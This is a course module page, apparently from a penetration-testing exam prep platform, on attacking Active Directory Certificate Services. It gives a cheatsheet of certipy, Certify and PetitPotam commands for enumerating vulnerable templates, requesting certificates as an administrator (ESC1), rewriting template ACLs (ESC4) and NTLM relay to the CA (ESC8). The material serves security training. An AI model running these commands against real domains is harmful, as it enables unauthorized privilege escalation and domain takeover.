Dashboard › Modules › AD CS Attacks

AD CS Attacks

Active Directory

> Start Learning

📖 Overview

Exploiting Active Directory Certificate Services misconfigurations.

🎯

Exercises

🃏

Flashcards

🗺️

Mind Maps

📋 Cheatsheet

Enumerate AD CS

Certify.exe find /vulnerable # Find vulnerable templates (ESC1, ESC8, etc.)
certipy find -u user@domain -p pass -dc-ip DC # Enumerate AD CS with Certipy

ESC1 - Misconfigured Template

certipy req -u user@domain -p pass -ca CA-NAME -template VulnTemplate -upn admin@domain # Request cert as Admin (ESC1)
certipy auth -pfx admin.pfx # Authenticate with certificate

ESC4 - Template ACL

certipy template -u user@domain -p pass -template VulnTemplate -save-old # Modify template to be vulnerable (ESC4)

ESC8 - NTLM Relay to HTTP

certipy relay -target http://ca-server/certsrv/certfnsh.asp # Start NTLM relay to AD CS
PetitPotam.py attacker-ip dc-ip # Coerce DC authentication to relay

💻 Command Examples

⚠️ Common Pitfalls

Many ESC paths - check all
Certificate validity periods vary
Need to understand template settings

💡 Exam Survival Tips

Always run Certify/certipy enumeration
ESC1 and ESC8 are most common
Certs can persist after password change

🗺️ Mind Maps

AD CS Attack Paths

Save Your Progress

AD CS Attacks

📖 Overview

📋 Cheatsheet

Enumerate AD CS

ESC1 - Misconfigured Template

ESC4 - Template ACL

ESC8 - NTLM Relay to HTTP

💻 Command Examples

⚠️ Common Pitfalls

💡 Exam Survival Tips

🗺️ Mind Maps